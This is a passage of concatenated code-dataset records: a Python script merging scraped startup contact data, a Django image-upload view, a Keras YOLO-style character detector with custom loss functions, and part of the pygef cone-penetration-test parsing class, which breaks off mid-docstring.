final_results.append(final_result)\n\nfinal_results = cleaner.clean(final_results)\n\nadd_keys = ['Facebook', 'LinkedIn', 'Twitter', 'Instagram', 'E-mail']\nreplace_keys = ['Site final', 'Response']\nadd_if_empty_keys = ['CNPJ']\n\nfor startup in startup_list:\n    clean_site = cleaner.clean_site(startup['Site'])\n    for result in final_results:\n        result_site = cleaner.clean_site(result['base_url'])\n        if clean_site == result_site:\n            for key in add_keys:\n                current_list = startup[key].split(',')\n                new_list = result[key].split(',')\n                final_list = sorted(list(unique(current_list + new_list)))\n                while '' in final_list:\n                    final_list.remove('')\n                startup[key] = ','.join(final_list)\n            for key in replace_keys:\n                new_list = result[key].split(',')\n                final_list = sorted(list(unique(new_list)))\n                while '' in final_list:\n                    final_list.remove('')\n                startup[key] = ','.join(final_list)\n            for key in add_if_empty_keys:\n                if not startup[key]:\n                    new_list = result[key].split(',')\n                    final_list = sorted(list(unique(new_list)))\n                    while '' in final_list:\n                        final_list.remove('')\n                    startup[key] = ','.join(final_list)\n\nerror_list = ['DNSLookupError', 'ResponseNeverReceived', 'TimeoutError']\n\nfor startup in startup_list:\n    for error in error_list:\n        if error in startup['Response']:\n            startup['Response'] = error\n\nddmdata.writecsv(startup_list, '{}_ss_merged.csv'.format(sl_name))\n","sub_path":"siteScraperMerge.py","file_name":"siteScraperMerge.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"446541421","text":"# -*- coding: utf-8 -*-\n\n#######################################################\n# Gallery display + avatar\n#######################################################\n\nfrom webservice.forms import UploadImageForm\nfrom django.core.context_processors import 
csrf\nfrom webservice.models import Images\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom datetime import datetime\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, HttpResponseRedirect\n\ndef images(request):\n\tif request.user.is_authenticated() is False:\n\t\treturn HttpResponseRedirect('/')\n\telif request.user.is_authenticated() is True:\n\t\tupload_image_form = UploadImageForm(auto_id='id_images_%s')\n\t\tsession = request.user\n\t\tc = {'session': session, 'upload_image_form': upload_image_form}\n\t\tc.update(csrf(request))\n\t\tif request.method == 'POST':\n\t\t\tform = UploadImageForm(request.POST, request.FILES)\n\t\t\tif form.is_valid():\n\t\t\t\tupload_image_entry = Images(owner=request.user,\n\t\t\t\t\tdescription=form.cleaned_data['description'],\n\t\t\t\t\tis_deleted=False,\n\t\t\t\t\tis_avatar=False,\n\t\t\t\t\tfilepath=form.cleaned_data['image'],\n\t\t\t\t\tdatetime=datetime.now())\n\t\t\t\tupload_image_entry.save()\n\t\t\t\treturn HttpResponse('saved')\n\t\t\treturn HttpResponse('form is not valid!')\n\t\t#TODO: implement the picture output\n\t\timageObjects = Images.objects.filter(owner=request.user)\n\t\tpictures = []\n\t\tdescriptions = []\n\t\tfor element in imageObjects:\n\t\t\tpictures.append(element.filepath)\n\t\t\tdescriptions.append(element.description)\n\t\tc['pictures'] = pictures\n\t\tc['descriptions'] = descriptions\n\t\treturn render_to_response('images.html', c, context_instance=RequestContext(request))","sub_path":"sevenrows/webservice/views/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"147528727","text":"import keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Flatten, Input, Reshape\nfrom keras.layers import Conv2D, MaxPooling2D, BatchNormalization\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU, ELU\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.utils import np_utils\n\nimport numpy as np\n\nfrom PIL import Image, ImageDraw, ImageFont\n\nimport matplotlib.pyplot as plt\n\nnb_boxes = 1 #lossYOLO_MultiDimensional is not implemented for nb_boxes > 1; use lossYOLO_1D instead (TODO)\ngrid_w = 4\ngrid_h = 4\ncell_w = 16\ncell_h = 16\nimg_w = grid_w * cell_w\nimg_h = grid_h * cell_h\n\nVOCAB = ['A', 'B', 'C']\nL_VOC = len(VOCAB)\n\nFONTS=['datas/fonts/0.ttf',\n       'datas/fonts/1.ttf',\n       'datas/fonts/2.otf',\n       'datas/fonts/3.ttf',\n       'datas/fonts/4.otf',\n       'datas/fonts/5.otf',\n       'datas/fonts/6.otf']\n\nBatchSize = 4\n\ndef tokenizeY(strTab, vocab):\n    #Text to one-hot\n    onehotData = []\n    for char in strTab:\n        onehotData.append(vocab.index(char))\n    \n    data = np.array(onehotData)\n    encoded = np_utils.to_categorical(data, num_classes=len(vocab))\n    \n    return encoded\n\ndef genElement(p=0.1, dbg=None):\n    while True:\n        #Generate the image\n        img = Image.new('RGB', (img_w, img_h))\n        drw = ImageDraw.Draw(img)\n        \n        #List of the predictions to produce (batch)\n        prd = []\n        \n        #Use a deterministic generation (useful for debugging)\n        #Shape : (grid_h * grid_w * nb_box, [class, x, y, width, height, confidence])\n        if dbg != None:\n            i = 0\n            for y in range(grid_h):\n                for x in range(grid_w):\n                    row = dbg[i]\n                    i += 1\n                    \n                    #Choose the character\n                    carac = row[0]\n                    \n                    #Contains the prediction elements of the current cell\n                    
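# Per-cell target layout, as assembled below: one-hot class over VOCAB, then for each box [x/cell_w, y/cell_h, w/img_w, h/img_h, confidence].\n                    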
p_elm = []\n                    p_elm.extend(tokenizeY(carac, VOCAB).tolist()[0])\n                    \n                    #For each box\n                    for z in range(nb_boxes):\n                        #Determine the shape of the character\n                        c_pol = 25\n                        c_fnt = ImageFont.truetype(FONTS[0], c_pol)\n                        c_rgb = (np.random.randint(64, 256), np.random.randint(64, 256), np.random.randint(64, 256))\n                        c_wdt, c_hgt = c_fnt.getsize(carac)\n                        \n                        #Pick a coordinate within the region (the centre of the box must lie inside the region)\n                        x_box = row[z*(2+2+1) + 1]\n                        y_box = row[z*(2+2+1) + 2]\n                        \n                        #Determine the absolute position of the character\n                        x_car = (cell_w * x) + x_box - (c_wdt / 2.0)\n                        y_car = (cell_h * y) + y_box - (c_hgt / 2.0)\n                        \n                        #Draw the character\n                        drw.text((x_car, y_car), carac, font=c_fnt, fill=c_rgb)\n                        \n                        #Populate the prediction element\n                        p_elm.append(x_box / cell_w)\n                        p_elm.append(y_box / cell_h)\n                        p_elm.append(c_wdt / img_w)\n                        p_elm.append(c_hgt / img_h)\n                        p_elm.append(1.0)\n\n                    prd.append(p_elm)\n            yield img, prd\n            continue\n\n        #Scan the image in reading order\n        for y in range(grid_h):\n            for x in range(grid_w):\n                #Decide whether the cell will contain a character\n                c_prb = p\n                c_win = np.random.choice([True, False], p=[c_prb, 1.0-c_prb])\n                \n                #If the cell must contain a character\n                if c_win:\n                    #Determine how many characters of the same type the cell must contain\n                    c_cpt = np.random.randint(nb_boxes)\n                    \n                    #Pick a character at random\n                    carac = np.random.choice(VOCAB)\n                    \n                    #Contains the prediction elements of the current cell\n                    p_elm = []\n                    p_elm.extend(tokenizeY(carac, VOCAB).tolist()[0])\n                    \n                    #For each box\n                    for z in range(nb_boxes):\n                        #Place a character if the counter is not exhausted\n                        if z <= c_cpt:\n                            #Determine the shape of the character\n                            c_pol = np.random.randint(15, 35)\n                            c_fnt = ImageFont.truetype(np.random.choice(FONTS), c_pol)\n                            c_rgb = (np.random.randint(64, 256), np.random.randint(64, 256), np.random.randint(64, 256))\n                            c_wdt, c_hgt = c_fnt.getsize(carac)\n                            \n                            #Pick a coordinate within the region (the centre of the box must lie inside the region)\n                            x_box = np.random.randint(0, cell_w)\n                            y_box = np.random.randint(0, cell_h)\n                            \n                            #Determine the absolute position of the character\n                            x_car = (cell_w * x) + x_box - (c_wdt / 2.0)\n                            y_car = (cell_h * y) + y_box - (c_hgt / 2.0)\n                            \n                            #Draw the character\n                            drw.text((x_car, y_car), carac, font=c_fnt, fill=c_rgb)\n                            \n                            #Populate the prediction element\n                            p_elm.append(x_box / cell_w)\n                            p_elm.append(y_box / cell_h)\n                            p_elm.append(c_wdt / img_w)\n                            p_elm.append(c_hgt / img_h)\n                            p_elm.append(1.0)\n                        else:\n                            #Populate the prediction element\n                            p_elm.append(0.0)\n                            p_elm.append(0.0)\n                            p_elm.append(0.0)\n                            p_elm.append(0.0)\n                            p_elm.append(0.0)\n                else:\n                    #Contains the prediction elements of the current cell\n                    p_elm = []\n                    p_elm.extend([0.0] * L_VOC)\n                    \n                    #For each box\n                    for z in range(nb_boxes):\n                        #Populate the prediction element\n                        p_elm.append(0.0)\n                        p_elm.append(0.0)\n                        p_elm.append(0.0)\n                        p_elm.append(0.0)\n                        p_elm.append(0.0)\n\n                prd.append(p_elm)\n\n        yield img, prd\n\ndef genDataset(N=1, dbg=None):\n    gen = genElement(p=0.15, dbg=dbg)\n    \n    while True:\n        n_train = N\n        x_train = []\n        y_train = []\n        \n        for i in range(n_train):\n            x, y = next(gen)\n            x_train.append(img_to_array(x))\n            y_train.append(y)\n        \n        yield np.array(x_train), np.array(y_train)\n\ndef getBoxedImg(img, prd, seuil=0.25):\n    drw = ImageDraw.Draw(img)\n    out = np.reshape(prd, (grid_h, grid_w, L_VOC+nb_boxes*(2+2+1)))\n    \n    #Scan the image in reading order\n    for y in range(grid_h):\n        for x in 
range(grid_w):\n            box = out[y, x] \n            b_c = VOCAB[np.argmax(box[0:L_VOC])]\n            \n            for z in range(nb_boxes):\n                b_f = box[L_VOC + z*(2+2+1) + 4]\n                \n                if b_f < seuil:\n                    continue\n                \n                b_w = box[L_VOC + z*(2+2+1) + 2] * img_w\n                b_h = box[L_VOC + z*(2+2+1) + 3] * img_h\n                b_x = box[L_VOC + z*(2+2+1) + 0] * cell_w + (cell_w * x) - (b_w / 2.0)\n                b_y = box[L_VOC + z*(2+2+1) + 1] * cell_h + (cell_h * y) - (b_h / 2.0)\n                \n                #drw.text((b_x, b_y), b_c)\n                drw.rectangle((b_x, b_y, b_x+b_w, b_y+b_h), outline=(255, 0, 0))\n                print('({0},{1},{2}) : \\'{3}\\' > {4:.3f}'.format(y, x, z, b_c, b_f))\n    print('')\n    \n    return img\n\ndef lossYOLO_MultiDimensional(y_true, y_pred):\n    #Training constants\n    lambda_coord = 5\n    lambda_noobj = 0.5\n    n_features = L_VOC+nb_boxes*(2+2+1)\n    Shape_Full = (BatchSize, grid_h*grid_w, n_features)\n    Shape_Class = (BatchSize, grid_h*grid_w, L_VOC)\n    Shape_XY = (BatchSize, grid_h*grid_w, 1)\n    Shape_WH = (BatchSize, grid_h*grid_w, 1)\n    Shape_CF = (BatchSize, grid_h*grid_w, 1)\n    \n    np_mask_x = np.zeros(Shape_Full)\n    np_mask_x[...,L_VOC+0] = 1\n    Mask_X = K.variable(np_mask_x)\n    \n    np_mask_y = np.zeros(Shape_Full)\n    np_mask_y[...,L_VOC+1] = 1\n    Mask_Y = K.variable(np_mask_y)\n    \n    Mask_XY = Mask_X + Mask_Y\n    \n    np_mask_w = np.zeros(Shape_Full)\n    np_mask_w[...,L_VOC+2] = 1\n    Mask_W = K.variable(np_mask_w)\n    \n    np_mask_h = np.zeros(Shape_Full)\n    np_mask_h[...,L_VOC+3] = 1\n    Mask_H = K.variable(np_mask_h)\n    \n    Mask_WH = Mask_W + Mask_H\n    \n    np_mask_cl = np.zeros(Shape_Full)\n    np_mask_cl[...,:L_VOC] = 1\n    Mask_CL = K.variable(np_mask_cl)\n    \n    np_mask_cf = np.zeros(Shape_Full)\n    np_mask_cf[...,L_VOC+4] = 1\n    Mask_CF = K.variable(np_mask_cf)\n    \n    #Variables\n    loss = K.zeros(Shape_Full)\n\n    #High-level extraction of the variables\n    y_true_class = K.reshape(y_true[..., :L_VOC], (-1, L_VOC))\n    y_pred_class = K.reshape(y_pred[..., :L_VOC], (-1, L_VOC))\n    y_true_boxes = K.transpose(K.reshape(y_true[..., L_VOC:], (-1, 2+2+1)))\n    y_pred_boxes = K.transpose(K.reshape(y_pred[..., L_VOC:], (-1, 2+2+1)))\n    y_true_x = y_true_boxes[0]\n    y_pred_x = y_pred_boxes[0]\n    y_true_y = y_true_boxes[1]\n    y_pred_y = y_pred_boxes[1]\n    y_true_dw = y_true_boxes[2]\n    y_pred_dw = y_pred_boxes[2]\n    y_true_dh = y_true_boxes[3]\n    y_pred_dh = y_pred_boxes[3]\n    y_true_cf = y_true_boxes[4]\n    y_pred_cf = y_pred_boxes[4]\n\n    ### Class loss\n    cl_errors = K.square(y_true_class - y_pred_class)\n    cl_errors = K.repeat_elements(cl_errors, nb_boxes, 0)\n    \n    pocl_mask = K.repeat_elements(y_true_cf, L_VOC, 0)\n    pocl_loss = K.flatten(cl_errors) * pocl_mask\n    pocl_fill = K.zeros((BatchSize, grid_h*grid_w, n_features-L_VOC))\n    pocl_loss = K.reshape(pocl_loss, (Shape_Class))\n    pocl_loss = K.concatenate([pocl_loss, pocl_fill])\n\n    nocl_mask = K.repeat_elements(K.abs(1.0 - y_true_cf), L_VOC, 0)\n    nocl_loss = K.flatten(cl_errors) * nocl_mask\n    nocl_fill = K.zeros((BatchSize, grid_h*grid_w, n_features-L_VOC))\n    nocl_loss = K.reshape(nocl_loss, (Shape_Class))\n    nocl_loss = K.concatenate([nocl_loss, nocl_fill])\n\n    ### Loss on the relative X and Y positions\n    xy_loss = (K.square(y_true_x - y_pred_x) + K.square(y_true_y - y_pred_y)) * y_true_cf\n    xy_loss = K.reshape(xy_loss, (Shape_XY))\n    xy_loss = K.repeat_elements(xy_loss, n_features, -1)\n    xy_loss = xy_loss * Mask_XY\n\n    ### Loss on the normalised W and H dimensions\n    wh_loss = (K.square(K.sqrt(y_true_dw) - K.sqrt(y_pred_dw)) + K.square(K.sqrt(y_true_dh) - K.sqrt(y_pred_dh))) * y_true_cf\n    wh_loss = K.reshape(wh_loss, (Shape_WH))\n    wh_loss = K.repeat_elements(wh_loss, n_features, -1)\n    
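# The (batch, cells, 1) w/h loss is broadcast across the feature axis, then masked so it lands only on the w/h slots.\n    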
wh_loss = wh_loss * Mask_WH\n\n    ### Confidence loss\n    #Convert the values to pixels (useful for debugging)\n    px_tx = y_true_x * cell_w\n    px_ty = y_true_y * cell_h\n    px_tw = y_true_dw * img_w\n    px_th = y_true_dh * img_h\n    px_px = y_pred_x * cell_w\n    px_py = y_pred_y * cell_h\n    px_pw = y_pred_dw * img_w\n    px_ph = y_pred_dh * img_h\n    \n    #Compute the intersections (xw) of the widths\n    aw = px_tw\n    bw = px_pw\n    iw = K.abs(px_tx - px_px)\n    jw = K.abs((px_tx + px_tw) - (px_px + px_pw))\n    xw = K.maximum(K.zeros_like(aw), (aw + bw - iw - jw) / 2.0)\n    \n    #Compute the intersections (xh) of the heights\n    ah = px_ty\n    bh = px_ph\n    ih = K.abs(px_ty - px_py)\n    jh = K.abs((px_ty + px_th) - (px_py + px_ph))\n    xh = K.maximum(K.zeros_like(ah), (ah + bh - ih - jh) / 2.0)\n\n    #Compute the intersection and union areas\n    intx_area = xw * xh\n    true_area = px_tw * px_th\n    pred_area = px_pw * px_ph\n    unio_area = pred_area + true_area - intx_area\n\n    #Compute the IOU\n    iou = intx_area / unio_area\n\n    #Compute the confidence loss\n    cf_loss = K.square(y_true_cf * iou - y_pred_cf)\n    cf_loss = K.reshape(cf_loss, (Shape_CF))\n    cf_loss = K.repeat_elements(cf_loss, n_features, -1)\n    cf_loss = cf_loss * Mask_CF\n\n    ### Compute the final loss\n    loss = lambda_coord * (xy_loss + wh_loss) + pocl_loss + lambda_noobj * nocl_loss + cf_loss\n\n    return loss\n\ndef lossYOLO_1D(y_true, y_pred):\n    #Training constants\n    lambda_coord = 5\n    lambda_noobj = 0.5\n\n    #High-level extraction of the variables\n    y_true_class = K.reshape(y_true[..., :L_VOC], (-1, L_VOC))\n    y_pred_class = K.reshape(y_pred[..., :L_VOC], (-1, L_VOC))\n    y_true_boxes = K.transpose(K.reshape(y_true[..., L_VOC:], (-1, 2+2+1)))\n    y_pred_boxes = K.transpose(K.reshape(y_pred[..., L_VOC:], (-1, 2+2+1)))\n    y_true_x = y_true_boxes[0]\n    y_pred_x = y_pred_boxes[0]\n    y_true_y = y_true_boxes[1]\n    y_pred_y = y_pred_boxes[1]\n    y_true_dw = y_true_boxes[2]\n    y_pred_dw = y_pred_boxes[2]\n    y_true_dh = y_true_boxes[3]\n    y_pred_dh = y_pred_boxes[3]\n    y_true_cf = y_true_boxes[4]\n    y_pred_cf = y_pred_boxes[4]\n\n    ### Class loss\n    cl_errors = K.sum(K.square(y_true_class - y_pred_class), axis=-1)\n    cl_errors = K.repeat_elements(cl_errors, nb_boxes, 0)\n    pocl_loss = K.sum(cl_errors * y_true_cf)\n    nocl_loss = K.sum(cl_errors * K.abs(1.0 - y_true_cf))\n\n    ### Loss on the relative X and Y positions\n    xy_loss = K.sum((K.square(y_true_x - y_pred_x) + \n                     K.square(y_true_y - y_pred_y)) * y_true_cf)\n\n    ### Loss on the normalised W and H dimensions\n    wh_loss = K.sum((K.square(K.sqrt(y_true_dw) - K.sqrt(y_pred_dw)) + \n                     K.square(K.sqrt(y_true_dh) - K.sqrt(y_pred_dh))) * y_true_cf)\n\n    ### Confidence loss\n    #Convert the values to pixels (useful for debugging)\n    px_tx = y_true_x * cell_w\n    px_ty = y_true_y * cell_h\n    px_tw = y_true_dw * img_w\n    px_th = y_true_dh * img_h\n    px_px = y_pred_x * cell_w\n    px_py = y_pred_y * cell_h\n    px_pw = y_pred_dw * img_w\n    px_ph = y_pred_dh * img_h\n    \n    #Compute the intersections (xw) of the widths\n    aw = px_tw\n    bw = px_pw\n    iw = K.abs(px_tx - px_px)\n    jw = K.abs((px_tx + px_tw) - (px_px + px_pw))\n    xw = K.maximum(K.zeros_like(aw), (aw + bw - iw - jw) / 2.0)\n    \n    #Compute the intersections (xh) of the heights\n    ah = px_ty\n    bh = px_ph\n    ih = K.abs(px_ty - px_py)\n    jh = K.abs((px_ty + px_th) - (px_py + px_ph))\n    xh = K.maximum(K.zeros_like(ah), (ah + bh - ih - jh) / 2.0)\n\n    #Compute the intersection and union areas\n    intx_area = xw * xh\n    true_area = px_tw * px_th\n    pred_area = px_pw * px_ph\n    unio_area = pred_area + true_area - intx_area\n\n    #Compute the 
IOU\n    iou = intx_area / unio_area\n\n    #Compute the confidence loss\n    cf_loss = K.sum(K.square(y_true_cf * iou - y_pred_cf))\n\n    #Normalise the losses\n    loss_norm = grid_w * grid_h * nb_boxes\n    pocl_loss /= loss_norm\n    nocl_loss /= loss_norm\n    xy_loss /= loss_norm\n    wh_loss /= loss_norm\n    cf_loss /= loss_norm\n\n    #Compute the final loss\n    loss = lambda_coord * (xy_loss + wh_loss) + pocl_loss + lambda_noobj * nocl_loss + cf_loss\n    \n    return loss\n\ndef createModel():\n    #VGG-like network (custom)\n    model = Sequential()\n    model.add(Conv2D( 16, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\", input_shape=(img_h, img_w, 3)))\n    model.add(Conv2D( 16, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n    model.add(BatchNormalization())\n    model.add(MaxPooling2D(pool_size=2))\n    model.add(Conv2D( 32, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n    model.add(Conv2D( 32, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n    model.add(BatchNormalization())\n    model.add(MaxPooling2D(pool_size=2))\n    model.add(Conv2D( 64, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n    model.add(Conv2D( 64, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n    model.add(BatchNormalization())\n    model.add(MaxPooling2D(pool_size=2))\n    model.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n    model.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n    model.add(BatchNormalization())\n    model.add(MaxPooling2D(pool_size=2))\n    model.add(Flatten())\n    model.add(Dense(256, activation='sigmoid'))\n    model.add(Dense(grid_w * grid_h * (L_VOC + nb_boxes * (2+2+1)), activation='sigmoid'))\n    model.add(Reshape((grid_w * grid_h, (L_VOC + nb_boxes * (2+2+1)))))\n\n    optim = keras.optimizers.Adam(lr=0.0001, decay=0.00)\n    model.compile(loss=lossYOLO_MultiDimensional, optimizer=optim)\n\n    return model\n\n# #######\n# #Sample\n# n_test = 4\n# t_gene = genDataset(n_test)\n# x_test, y_test = next(t_gene)\n# #%matplotlib qt\n# for i in range(n_test):\n#     img = getBoxedImg(array_to_img(x_test[i]), y_test[i])\n#     plt.subplot(2, 2, i+1)\n#     plt.imshow(img)\n#     plt.show()\n\n\n# ######\n# #Train\n# model = createModel()\n# model.summary()\n# # model.load_weights('weights.h5')\n# model.fit_generator(genDataset(BatchSize), steps_per_epoch=256, epochs=50)\n# model.save_weights('weights.h5')\n\n#####\n#Sample pred\nmodel = createModel()\nmodel.load_weights('weights.h5')\nn_test = 5*5\nt_gene = genDataset(n_test)\nx_test, y_test = next(t_gene)\ny = model.predict(x_test, verbose=1)\n#%matplotlib qt\nfor i in range(n_test):\n    img = getBoxedImg(array_to_img(x_test[i]), y[i], 0.1)\n    plt.subplot(5, 5, i+1)\n    plt.imshow(img)\nplt.show()\n","sub_path":"yolo_char.py","file_name":"yolo_char.py","file_ext":"py","file_size_in_byte":18680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"233075271","text":"import logging\nfrom typing import Union\n\nimport pygef.plot_utils as plot\nfrom pygef import been_jefferies, robertson\nfrom pygef.base import Base\nfrom pygef.broxml import _BroXmlCpt\nfrom pygef.gef import _GefCpt\nfrom pygef.grouping import GroupClassification\n\nlogger = logging.getLogger(__name__)\n\n\nclass Cpt(Base):\n    \"\"\"\n    **Cpt attributes:**\n    *Always present:*\n        type: str\n            Type of the gef 
file\n        project_id: str\n            Project id\n        x: float\n            X coordinate with respect to the coordinate system\n        y: float\n            Y coordinate with respect to the coordinate system\n        zid: float\n            Z coordinate with respect to the height system\n        height_system: float\n            Type of coordinate system, 31000 is NAP\n        file_date: datetime.datetime\n            Start date time\n        test_id: str\n            Identifying name of gef file.\n        s: str\n            String version of gef file.\n        df: polars.DataFrame\n            DataFrame containing the same columns as the original .gef file and\n            some additional columns [depth, elevation_with_respect_to_nap]\n\n            Tip: Use the depth column instead of the penetration_length, the depth is corrected\n            with the inclination (if present).\n\n            Note that the Friction ratio is always calculated from the fs and qc values and not parsed from the file.\n\n            If this attribute is called after the classify method the columns relative to the classification\n            are also contained.\n\n    *Not always present*\n\n        default: None\n        The description is added only for the most important attributes, for the others check:\n        https://publicwiki.deltares.nl/download/attachments/102204318/GEF-CPT.pdf?version=1&modificationDate=1409732008000&api=v2\n\n        cpt_class: str\n            Cpt class. The format is not standard so it might not always be properly parsed.\n        column_void: str\n            The 'no value' definition for the gef file\n        nom_surface_area_cone_tip: float\n            Nom. surface area of cone tip [mm2]\n        nom_surface_area_friction_element: float\n            Nom. surface area of friction casing [mm2]\n        net_surface_area_quotient_of_the_cone_tip: float\n            Net surface area quotient of cone tip [-]\n        net_surface_area_quotient_of_the_friction_casing: float\n            Net surface area quotient of friction casing [-]\n        distance_between_cone_and_centre_of_friction_casing: float\n\n        friction_present: float\n\n        ppt_u1_present: float\n\n        ppt_u2_present: float\n\n        ppt_u3_present: float\n\n        inclination_measurement_present: float\n\n        use_of_back_flow_compensator: float\n\n        type_of_cone_penetration_test: float\n\n        pre_excavated_depth: float\n            Pre-excavated depth [m]\n        groundwater_level: float\n            Ground water level [m]\n        water_depth_offshore_activities: float\n        end_depth_of_penetration_test: float\n        stop_criteria: float\n\n        zero_measurement_cone_before_penetration_test: float\n\n        zero_measurement_cone_after_penetration_test: float\n\n        zero_measurement_friction_before_penetration_test: float\n\n        zero_measurement_friction_after_penetration_test: float\n\n        zero_measurement_ppt_u1_before_penetration_test: float\n\n        zero_measurement_ppt_u1_after_penetration_test: float\n\n        zero_measurement_ppt_u2_before_penetration_test: float\n\n        zero_measurement_ppt_u2_after_penetration_test: float\n\n        zero_measurement_ppt_u3_before_penetration_test: float\n\n        zero_measurement_ppt_u3_after_penetration_test: float\n\n        zero_measurement_inclination_before_penetration_test: float\n\n        zero_measurement_inclination_after_penetration_test: float\n\n        zero_measurement_inclination_ns_before_penetration_test: float\n\n        zero_measurement_inclination_ns_after_penetration_test: float\n\n        zero_measurement_inclination_ew_before_penetration_test: float\n\n        zero_measurement_inclination_ew_after_penetration_test : float\n\n        mileage: float\n    \"\"\"\n\n    def __init__(self, path=None, content: dict = None):\n        \"\"\"\n        Cpt class.\n\n        Parameters\n        ----------\n        path:\n            Path to the file.\n        content: dict\n            Dictionary with keys: [\"string\", \"file_type\"]\n            - string: str\n                String version of the file.\n            - file_type: str\n                One of [gef, xml]\n        \"\"\"\n        
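# Defaults for header fields that may be absent from a file; the parsed attributes below overwrite them.\n        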
self.net_surface_area_quotient_of_the_cone_tip = None\n        self.pre_excavated_depth = None\n\n        super().__init__()\n\n        parsed: Union[_BroXmlCpt, _GefCpt]\n\n        if content is not None:\n            assert (\n                content[\"file_type\"] == \"gef\" or content[\"file_type\"] == \"xml\"\n            ), \"file_type can only be one of [gef, xml]\"\n            assert content[\"string\"] is not None, \"content['string'] must be specified\"\n            if content[\"file_type\"] == \"gef\":\n                parsed = _GefCpt(string=content[\"string\"])\n            elif content[\"file_type\"] == \"xml\":\n                parsed = _BroXmlCpt(string=content[\"string\"])\n\n        elif path is not None:\n            if path.lower().endswith(\"gef\"):\n                parsed = _GefCpt(path)\n            elif path.lower().endswith(\"xml\"):\n                parsed = _BroXmlCpt(path)\n        else:\n            raise ValueError(\"One of [path, (string, file_type)] should be not None.\")\n\n        self.__dict__.update(parsed.__dict__)\n\n    def classify(\n        self,\n        classification,\n        water_level_NAP=None,\n        water_level_wrt_depth=None,\n        p_a=0.1,\n        new=True,\n        do_grouping=False,\n        min_thickness=None,\n    ):\n        \"\"\"\n        Classify each row of the cpt type.\n\n        Parameters\n        ----------\n        classification: str\n            Specify the classification, possible choices : \"robertson\", \"been_jefferies\".\n        water_level_NAP: float, only for cpt type, necessary for the classification: give this or water_level_wrt_depth\n            Water level with respect to NAP\n        water_level_wrt_depth: float, only for cpt type, necessary for the classification: give this or water_level_NAP\n            Water level with respect to the ground_level [0], it should be a negative value.\n        p_a: float\n            Atmospheric pressure. Default: 0.1 MPa.\n        new: bool, default:True\n            If True and the classification is robertson, the new(2016) implementation of robertson is used.\n        do_grouping: bool, optional for the classification\n            If True a group classification is added to the plot.\n        min_thickness: float, optional for the classification [m]\n            If specified together with the do_grouping set to True, a group classification is added to the plot.\n            The grouping is a simple algorithm that merges all the layers < min_thickness with the last above one > min_thickness.\n            In order to not make a big error do not use a value bigger than 0.2 m\n\n        Returns\n        -------\n        df: polars.DataFrame\n            If do_grouping is True a polars.DataFrame with the grouped layer is returned otherwise a polars.DataFrame\n            with a classification for each row is returned.\n\n        \"\"\"\n        # todo: refactor arguments, the arguments connected to each other\n        # should be given as a dict or tuple, check order\n        water_level_and_zid_NAP = dict(water_level_NAP=water_level_NAP, zid=self.zid)\n\n        if water_level_NAP is None and water_level_wrt_depth is None:\n            water_level_wrt_depth = -1\n            logger.warning(\n                f\"You did not input the water level, a default value of -1 m with respect to the ground is used.\"\n                f\" Change it using the kwarg water_level_NAP or water_level_wrt_depth.\"\n            )\n        if min_thickness is None:\n            min_thickness = 0.2\n            logger.warning(\n                f\"You did not input the accepted minimum thickness, a default value of 0.2 m is used.\"\n                f\" Change it using the kwarg min_thickness\"\n            )\n\n        if classification == \"robertson\":\n            df = robertson.classify(\n                self.df,\n                water_level_and_zid_NAP=water_level_and_zid_NAP,\n                water_level_wrt_depth=water_level_wrt_depth,\n                new=new,\n                area_quotient_cone_tip=self.net_surface_area_quotient_of_the_cone_tip,\n                pre_excavated_depth=self.pre_excavated_depth,\n                p_a=p_a,\n            )\n            if do_grouping:\n                return GroupClassification(self.zid, df, min_thickness).df_group\n            return df\n\n        elif classification 
== \"been_jefferies\":\n df = been_jefferies.classify(\n self.df,\n water_level_and_zid_NAP=water_level_and_zid_NAP,\n water_level_wrt_depth=water_level_wrt_depth,\n area_quotient_cone_tip=self.net_surface_area_quotient_of_the_cone_tip,\n pre_excavated_depth=self.pre_excavated_depth,\n )\n if do_grouping:\n return GroupClassification(self.zid, df, min_thickness).df_group\n return df\n else:\n raise ValueError(\n f\"Could not find {classification}. Check the spelling or classification not defined in the library\"\n )\n\n def plot(\n self,\n classification=None,\n water_level_NAP=None,\n water_level_wrt_depth=None,\n min_thickness=None,\n p_a=0.1,\n new=True,\n show=False,\n figsize=(11, 8),\n df_group=None,\n do_grouping=False,\n grid_step_x=None,\n dpi=100,\n colors=None,\n z_NAP=False,\n ):\n \"\"\"\n Plot the cpt file and return matplotlib.pyplot.figure .\n\n Parameters\n ----------\n classification: str, only for cpt type\n If classification (\"robertson\", \"been_jefferies\") is specified a subplot is added with the classification\n for each cpt row.\n water_level_NAP: float, only for cpt type, necessary for the classification: give this or water_level_wrt_depth\n Water level with respect to NAP\n water_level_wrt_depth: float, only for cpt type, necessary for the classification: give this or water_level_NAP\n Water level with respect to the ground_level [0], it should be a negative value.\n min_thickness: float, only for cpt type, optional for the classification [m]\n If specified together with the do_grouping set to True, a group classification is added to the plot.\n The grouping is a simple algorithm that merge all the layers < min_thickness with the last above one >\n min_thickness.\n In order to not make a big error do not use a value bigger then 0.2 m\n p_a: float, only for cpt type, optional for the classification\n Atmospheric pressure. 
